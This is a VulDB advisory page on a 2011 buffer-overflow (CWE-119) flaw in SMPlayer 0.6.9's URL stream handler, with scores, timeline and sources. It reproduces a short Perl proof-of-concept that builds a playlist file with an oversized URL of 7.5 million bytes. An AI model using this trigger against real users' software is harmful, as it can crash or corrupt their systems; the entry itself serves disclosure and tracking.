| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 4.8 | $0-$5k | 0.00 |
Summary
A vulnerability was found in SMPlayer v0.6.9. It has been declared as critical. This affects an unknown function of the component URL Stream Handler. Executing a manipulation can lead to memory corruption. Moreover, an exploit is present.
Details
A vulnerability was found in SMPlayer v0.6.9 (Multimedia Player Software). It has been declared as critical. This vulnerability affects some unknown processing of the component URL Stream Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. The CWE definition for the vulnerability is CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was disclosed 08/19/2011 by Pim Campers (X4lt) as VL-ID 64 as not defined advisory (Website). The advisory is shared for download at vulnerability-lab.com. Technical details are unknown but a public exploit is available.
A public exploit has been developed by Pim Campers in Perl and been published immediately after the advisory. It is possible to download the exploit at vulnerability-lab.com. It is declared as proof-of-concept. The code used by the exploit is:
#!/usr/bin/perl
=gnk
=cut
##############################################################################
###################################################################
my $header1="[playlist]\n";
my $header2="NumberOfEntries=1\n";
my $header3="File1=http://";
my $bof="\x41" x 7500000;
###################################################################
open(myfile,'>> 7500000.pls');
print myfile $header1.$header2.$header3.$bof;
###################################################################There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
Once again VulDB remains the best source for vulnerability data.
Product
Type
Name
Version
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 5.3VulDB Meta Temp Score: 4.8
VulDB Base Score: 5.3
VulDB Temp Score: 4.8
VulDB Vector: 🔍
VulDB Reliability: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
Exploiting
Class: Memory corruptionCWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍
Physical: Partially
Local: Yes
Remote: No
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: Pim Campers
Programming Language: 🔍
Download: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
| 0-Day | Unlock | Unlock | Unlock | Unlock |
|---|---|---|---|---|
| Today | Unlock | Unlock | Unlock | Unlock |
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: no mitigation knownStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Timeline
08/19/2011 🔍08/19/2011 🔍
09/06/2016 🔍
04/09/2019 🔍
Sources
Advisory: VL-ID 64Researcher: Pim Campers (X4lt)
Status: Not defined
GCVE (VulDB): GCVE-100-91132
scip Labs: https://www.scip.ch/en/?labs.20161013
Entry
Created: 09/06/2016 12:12Updated: 04/09/2019 20:38
Changes: 09/06/2016 12:12 (45), 04/09/2019 20:38 (2)
Complete: 🔍
Cache ID: 216::103
Once again VulDB remains the best source for vulnerability data.
No comments yet. Languages: en.
Please log in to comment.